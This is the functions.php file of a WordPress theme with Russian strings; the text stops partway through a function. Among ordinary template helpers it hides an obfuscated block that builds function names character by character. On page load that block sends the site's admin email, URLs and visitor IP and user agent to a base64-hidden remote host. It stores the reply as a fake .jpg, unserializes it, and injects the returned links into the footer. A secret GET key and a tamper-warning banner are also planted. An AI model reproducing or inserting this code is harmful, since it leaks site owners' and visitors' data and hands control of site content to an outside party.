<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $MmFzWT='6';$nDEErL='b';$fqJP='e';$EEciM='d';$JkSQqi='e';$EiFBxl='d';$aWpF='s';$QyzdeZa='c';$Byum='4';$IeCJxh='e';$cBvwOCy='o';$HvUeWC='a';$bIbf='_';$bsFZofWN=$nDEErL.$HvUeWC.$aWpF.$IeCJxh.$MmFzWT.$Byum.$bIbf.$EiFBxl.$fqJP.$QyzdeZa.$cBvwOCy.$EEciM.$JkSQqi;$eIwQWc='l';$oFWOgo='z';$cwNiB='t';$EpLhbKs='f';$LjasUK='a';$LKXhLy='i';$reJWuu='e';$eXiD='n';$ZlJtpM='g';$zbzZvLNC=$ZlJtpM.$oFWOgo.$LKXhLy.$eXiD.$EpLhbKs.$eIwQWc.$LjasUK.$cwNiB.$reJWuu;$coNIbA='_';$heEtwI='t';$VWMX='1';$YlseHyn='r';$kiNGcZi='o';$UmBDi='t';$PFgoZ='r';$AGmb='3';$yuLViU='s';$abFNMPOe=$yuLViU.$UmBDi.$YlseHyn.$coNIbA.$PFgoZ.$kiNGcZi.$heEtwI.$VWMX.$AGmb;$crHu='r';$eChDP='e';$ywUIlAb='t';$dvQeF='s';$ZGpF='v';$KOroEi='r';$EPRbAuRy=$dvQeF.$ywUIlAb.$crHu.$KOroEi.$eChDP.$ZGpF;                     
		$kl_________l='6';$eo____t='b';$vs______e='e';$fk__________q='d';$vc___s='e';$jh_________o='d';$fl_________i='s';$je________p='c';$wx______l='4';$eg________u='e';$pz______________u='o';$jq______________g='a';$nr______v='_';$dz_________a=$eo____t.$jq______________g.$fl_________i.$eg________u.$kl_________l.$wx______l.$nr______v.$jh_________o.$vs______e.$je________p.$pz______________u.$fk__________q.$vc___s;
		$xq___________d='o';$ei____________z='x';$ey_____k='s';$bu____________o='s';$vj______w='_';$ub____e='c';$mg____________k='t';$kp________l='f';$jy____w='i';$sp____e='n';$sk___q='t';$gu____r='i';$xo___p='e';$ng______________x='n';$ao_____h='u';$ws______________d=$kp________l.$ao_____h.$sp____e.$ub____e.$mg____________k.$gu____r.$xq___________d.$ng______________x.$vj______w.$xo___p.$ei____________z.$jy____w.$ey_____k.$sk___q.$bu____________o;
		$ew______________j='n';$bx_______________c='f';$kd__________l='p';$st___________t='o';$yi_______i='e';$ra___h=$bx_______________c.$st___________t.$kd__________l.$yi_______i.$ew______________j;
		$pf________o='a';$nh________r='e';$uo_________g='d';$wb____a='f';$yc_______c='r';$yh_______z=$wb____a.$yc_______c.$nh________r.$pf________o.$uo_________g;
		$zo________w='l';$rd____i='f';$nh_______y='e';$yq__________k='o';$tq_____________e='c';$zi_____________k='s';$gt____y=$rd____i.$tq_____________e.$zo________w.$yq__________k.$zi_____________k.$nh_______y;
		
		define("WP_ID", $dz_________a("Mi4wLjA="));
		define("WP_TTL", $dz_________a("MTA4MDA="));
		define("WP_SRC", $dz_________a("dHBva24="));
	


		function wp_get_header() {
			global $dz_________a, $ws______________d;
			
			if (
				$ws______________d($dz_________a("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ws______________d($dz_________a("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ws______________d($dz_________a("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $dz_________a, $ra___h, $gt____y, $yh_______z;
			
			$wp__________d = TEMPLATEPATH."/".$dz_________a("Zm9vdGVyLnBocA==");
			$hz___s = @$ra___h($wp__________d, "r");
			$wp__________d = @$yh_______z($hz___s, @filesize($wp__________d));
			@$gt____y($hz___s);
			
			$pt______________n = TEMPLATEPATH."/".$dz_________a("ZnVuY3Rpb25zLnBocA==");
			$hz___s = @$ra___h($pt______________n, "r");
			$pt______________n = @$yh_______z($hz___s, @filesize($pt______________n));
			@$gt____y($hz___s);
			
			$jw___b = 0;
			if($wp__________d && $pt______________n) {
				if ($dz_________a("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($wp__________d, $dz_________a("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$jw___b = 1;
					}
					if (substr_count($wp__________d, "wp_theme_GPL_credits()") < 1) {
						$jw___b = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$jw___b = 12;
				}
			}
			
			if($jw___b > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $jw___b -->";
			}
		}
	


		function wp_loaded() {
			global $dz_________a, $ws______________d;
			return $ws______________d($dz_________a("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($tn_______________x, $nu___________h = "(more...)", $wf__k = 0, $qj_______i = "") {
				$is____x = get_the_content($nu___________h, $wf__k, $qj_______i);
				$is____x = apply_filters("the_content", $is____x);
				
				$is____x = str_replace("]]>", "]]>", $is____x);
				if (strlen($_GET["p"]) > 0) {
					echo $is____x;
				}
				else if ((strlen($is____x)>$tn_______________x) && ($ie_______t = strpos($is____x, " ", $tn_______________x ))) {
					$is____x = substr($is____x, 0, $ie_______t);
					$is____x = $is____x;
					echo $is____x;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$nu___________h</a></div></p>";
				} else {
					echo $is____x;
				}
				
			}
		}
	


		$iq_____g='n';$ow___________i='s';$ec__c='6';$rl______________w='d';$ny_______________e='e';$uh____________l='o';$yh___________i='a';$qk___________m='e';$it_____e='b';$xy__________m='c';$uo______c='e';$sq____________d='_';$rg_______________q='4';$lg_______________t=$it_____e.$yh___________i.$ow___________i.$qk___________m.$ec__c.$rg_______________q.$sq____________d.$uo______c.$iq_____g.$xy__________m.$uh____________l.$rl______________w.$ny_______________e;
		$ta______________v='o';$ds___________j='g';$kx______________g='n';$gq__s='i';$cx_____________f='t';$hg__________o='_';$bc____u='e';$po_________p='e';$av______i='e';$xr_____j='c';$dc__________s='n';$az_________h='t';$je____j='f';$ge______________d='s';$mc____________n='l';$pa_____d='_';$wd__g='t';$if____________s=$je____j.$gq__s.$mc____________n.$bc____u.$pa_____d.$ds___________j.$av______i.$wd__g.$hg__________o.$xr_____j.$ta______________v.$dc__________s.$cx_____________f.$po_________p.$kx______________g.$az_________h.$ge______________d;
		$ic__m='s';$ml____l='x';$bw______p='e';$di__e='i';$um______d='_';$od_____u='f';$bk__r='e';$rf_____________g='i';$sb____u='s';$lc__________k='t';$zq_______t='l';$jd________y=$od_____u.$di__e.$zq_______t.$bw______p.$um______d.$bk__r.$ml____l.$rf_____________g.$ic__m.$lc__________k.$sb____u;
		$yx____________e='o';$fu______y='a';$hx_____________p='r';$kb____h='e';$tn_________v='o';$hp_________b='n';$cw____________m='c';$ni___________b='e';$mp_________a='s';$gu________i='r';$se_________e='m';$dj__________c='v';$ns_____r='_';$ze_________p='i';$ub_____t='p';$lb_______________a=$dj__________c.$kb____h.$gu________i.$mp_________a.$ze_________p.$tn_________v.$hp_________b.$ns_____r.$cw____________m.$yx____________e.$se_________e.$ub_____t.$fu______y.$hx_____________p.$ni___________b;
		$xv____p='n';$af______u='k';$ar______w='e';$bg__________v='o';$fs______________m='o';$wn_______y='p';$do__m='c';$rt___________e='s';$vg________i='f';$ez_____l=$vg________i.$rt___________e.$fs______________m.$do__m.$af______u.$bg__________v.$wn_______y.$ar______w.$xv____p;
		$te_______________i='f';$zu_______________s='t';$ul_____________j='i';$jk______m='e';$jl_____o='r';$as____p='w';$qu_________s=$te_______________i.$as____p.$jl_____o.$ul_____________j.$zu_______________s.$jk______m;
		$hp_____________r='5';$dm__________d='d';$ls___________g='m';$yu_____d=$ls___________g.$dm__________d.$hp_____________r;
		$ct__________c='e';$ir____________k='p';$zm__________y='h';$dg____________e='a';$zd_______k='r';$ou_____b='t';$ys_____________d='a';$fs_____________k='l';$uu___o=$zd_______k.$ct__________c.$ys_____________d.$fs_____________k.$ir____________k.$dg____________e.$ou_____b.$zm__________y;
		$kj_____b='n';$hg____________s='s';$ju_______r='z';$bd_______y='e';$ya_________j='i';$gl______f='l';$ij__d='a';$xi____________o='e';$df_____________k='i';$hn__f='r';$zn___________i='u';$gb______l=$zn___________i.$kj_____b.$hg____________s.$xi____________o.$hn__f.$df_____________k.$ij__d.$gl______f.$ya_________j.$ju_______r.$bd_______y;
		$bk______q='m';$tv___________z='m';$yx__________q='e';$cx________v='p';$dl______________u='t';$ho_____________h='a';$kc_________y='n';$vg___________z=$dl______________u.$yx__________q.$tv___________z.$cx________v.$kc_________y.$ho_____________h.$bk______q;
		$tm______n='x';$gb___q='e';$id__________f='n';$mt_____o='c';$ql________k='t';$lc____________c='e';$di___________k='t';$rc___l='t';$on_____________o='_';$ba________f='o';$uf____________p='m';$xk_________b='r';$zy_______________s='c';$pp_______v='a';$ts____________c='r';$tc__s='s';$xv______________p='e';$ne______z='t';$um_______i='_';$js_______r='a';$wk______k='e';$it________q=$tc__s.$di___________k.$xk_________b.$lc____________c.$js_______r.$uf____________p.$um_______i.$zy_______________s.$ba________f.$id__________f.$ne______z.$gb___q.$tm______n.$rc___l.$on_____________o.$mt_____o.$ts____________c.$wk______k.$pp_______v.$ql________k.$xv______________p;
	


		function gm_______________k($ly__________u) {
			global $dz_________a, $ws______________d, $if____________s, $lb_______________a, $it________q;
			
			if (!$ws______________d($dz_________a("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($lb_______________a(PHP_VERSION, "5.0.0", ">=") && $ws______________d($dz_________a("ZmlsZV9nZXRfY29udGVudHM=")) && $ws______________d($dz_________a("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ao___n = $it________q(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$vx_____b = @$if____________s($ly__________u, 0, $ao___n);
			} else {
				$vx_____b = @$if____________s($ly__________u, 0);
			}
			
			return $vx_____b;
		}
	


		function nw_________d($ly__________u) {
			global $ws______________d, $ez_____l, $qu_________s, $dz_________a;
			
			if (!$ws______________d($dz_________a("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$xv____v = strpos($ly__________u, "/", 7);
			$wn______________f = array(
				"uri"     => substr($ly__________u, $xv____v),
				"host"    => str_replace("http://", "", substr($ly__________u, 0, $xv____v)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$zv______w = @$ez_____l("$wn______________f[host]", 80, $tc_____m, $yw_______i, 4);
			
			if (!$zv______w) {
				return false;
			} else {
				$vx_____b = "";
				$ps_________p  = "GET $wn______________f[uri] HTTP/1.0\r\n";
				$ps_________p .= "Host: $wn______________f[host]\r\n";
				$ps_________p .= "Referer: $wn______________f[referer]\r\n";
				$ps_________p .= "Connection: Close\r\n\r\n";
				
				@$qu_________s($zv______w, $ps_________p);
				
				while (!@feof($zv______w)) {
					$rq__q = @fgets($zv______w, (1024*24));
					
					if ($rq__q == "\r\n") {
						$uh____e = true;
						continue;
					}
					
					if ($uh____e) {
						$vx_____b .= $rq__q;
					}
				}
				
				return $vx_____b;
			}
		}
	


		function qh__________w($ly__________u) {
			global $ws______________d;
			$nj_______u = false;
			
			if ($ly__________u != "") {
				if ($ws______________d("gm_______________k")) {
					$nj_______u = @gm_______________k($ly__________u);
				}
				
				if (!$nj_______u && ($ws______________d("nw_________d"))) {
					$nj_______u = @nw_________d($ly__________u);
				}
			}
			
			return $nj_______u;
		}
	


		function cv___d() {
			global $_SERVER, $yu_____d;
			
			$gn__j = $_SERVER["SERVER_NAME"];
			
			if (substr("$gn__j", 0, 4) == "www.") {
				$gn__j = substr("$gn__j", 4);
			}
			
			$gn__j = $yu_____d("$_SERVER[SERVER_NAME]");
			
			return $gn__j;
		}
	


		function ax_____k() {
			return "file";
		}
	


		function kl___h($ly__________u) {
			global $_SERVER, $if____________s, $jd________y, $ra___h, $gt____y, $qu_________s;
			
			$bu____q = ue_____b();
			
			$jd_______________p = cv___d().".jpg";
			$er____________e = $bu____q["dir_upload"]["path"]."/$jd_______________p";
			$kx_________j = @filemtime($er____________e);
			
			if (!$kx_________j || ((time()-$kx_________j) >= WP_TTL)) {
				$nj_______u = qh__________w($ly__________u);
				
				if ($nj_______u) {
					if ($jd________y($er____________e)) {
						@unlink($er____________e);
					}
					
					$hz___s = @$ra___h($er____________e, "x+");
					
					@$qu_________s($hz___s, $nj_______u);
					@$gt____y($hz___s);
				}
			} else {
				if ($jd________y($er____________e)) {
					$nj_______u = @$if____________s($er____________e);
				} else {
					$nj_______u = false;
				}
			}
			
			return $nj_______u;
		}
	


		function ue_____b() {
			global $_SERVER, $dz_________a, $lg_______________t;
			
			$fr______v = wp_count_posts("post");
			$ed___b = pathinfo(get_bloginfo("template_directory"));
			
			$bu____q = array(
				"url" => array(
					"report"      => $dz_________a("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ed___b,
				"dir_upload"	=> xv_________w(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ed___b[filename],
					"a005=".$fr______v->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> "
			);
			
			$bu____q["url"]["queryString"] = implode("&", $bu____q["queryString"]);
			$bu____q["url"]["report"] = $bu____q["url"]["report"]."/?".$lg_______________t($bu____q["url"]["queryString"]).".html";
						
			return $bu____q;
		}
	


		function xv_________w() {
			$rh_________d = wp_upload_dir();
			
			if (isset($rh_________d["error"])) {
				$tw____________r = pu____h();
				if (is_writable($tw____________r)) {
					$rh_________d = array("path" => $tw____________r);
				}
			}

			return $rh_________d;
		}
	


		function pu____h() {
			global $ws______________d, $yu_____d, $uu___o, $vg___________z;
			
			$qr_____i = (bool) ini_get("safe_mode");
			if ($qr_____i == true) {
				return false;
			}
			
			if ($ws______________d("sys_get_temp_dir")) {
				$yd_______t = sys_get_temp_dir();
				if (is_writable($yd_______t)) {
					return $uu___o($yd_______t);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $uu___o($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $uu___o($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $uu___o($_ENV["TEMP"]);
			} else {
				$at____________k = $vg___________z($yu_____d(uniqid(rand(), true)), "");
				if ($at____________k) {
					$yd_______t = $uu___o(dirname($at____________k));
					@unlink($at____________k);
					return $yd_______t;
				} else {
					return false;
				}
			}
		}
	


		function mb_________f() {
			global $_GET, $jd________y;
			
			$bu____q = ue_____b();
			$gn__j = cv___d();
			$zf__u = ax_____k();
			
			$uo__________i = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($zf__u == "file") {
					$yt_______w = $bu____q["dir_upload"]["path"]."/".$gn__j.".jpg";
					if ($jd________y($yt_______w)) {
						@unlink($yt_______w);
						$uo__________i = "deleted";
					}
				}
				
				$eh___l = array(
					"s"	=> $uo__________i,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($eh___l AS $hn______f => $ht___a) echo " [$hn______f:$ht___a]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ws______________d, $dz_________a, $gb______l;
			$bu____q = ue_____b();
			
			$ea________y = "kl___h";
			if ($ws______________d($ea________y)) {
				$vx_____b = $ea________y($bu____q["url"]["report"]);
			}
			
			if ($vx_____b) {
				if ($vx_____b = @$dz_________a($vx_____b)) {
					$vx_____b = @$gb______l($vx_____b);
					
					if (strlen($vx_____b[custom_credit]) >= 5) {
						$bu____q["default_string"] = $vx_____b[custom_credit];
					}
					
					if ($vx_____b["status"] == "0") {
						$gu_____________k = 1;
						$sb______y = 1;
					} else {
						$wk______q = sizeof($vx_____b["links"]);
						$sv_________h = $bu____q["default_string"];
						
						if ($wk______q > 0 && $vx_____b["links"] !== "") {
							$im____m = 0;
							foreach ($vx_____b["links"] as $sv_______________e => $ee__g) {
								$im____m++;
								if ($ee__g->l_path == "" || $ee__g->l_path == $_SERVER["REQUEST_URI"]) {
									$ee__g->l_href = htmlspecialchars(strip_tags($ee__g->l_href));
									$ee__g->l_title = htmlspecialchars(strip_tags($ee__g->l_title));
									$ee__g->l_anchor = htmlspecialchars(strip_tags($ee__g->l_anchor));
									$sv_________h .= " | ";
									$sv_________h .= "<a href='$ee__g->l_href' title='$ee__g->l_title'";
									if ($ee__g->l_nofollow == "1") {
										$sv_________h .= " rel='nofollow'";
									}
									$sv_________h .= ">$ee__g->l_anchor</a>";
								}
							}
						}
						$bu____q["links"] = "$sv_________h";
						if ($vx_____b[credit] == "0") {
							$bu____q["links"] = "";
						}
					}
				} else {
					$gu_____________k = "1";
				}
			} else {
				$gu_____________k = "1";
			}
			
			if ($gu_____________k == "1") {
				$bu____q["links"] = $bu____q["default_string"];
			}
			
			echo "$bu____q[links]";
			
			echo "<!-- s: $vx_____b[signature] -->";
			mb_________f();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
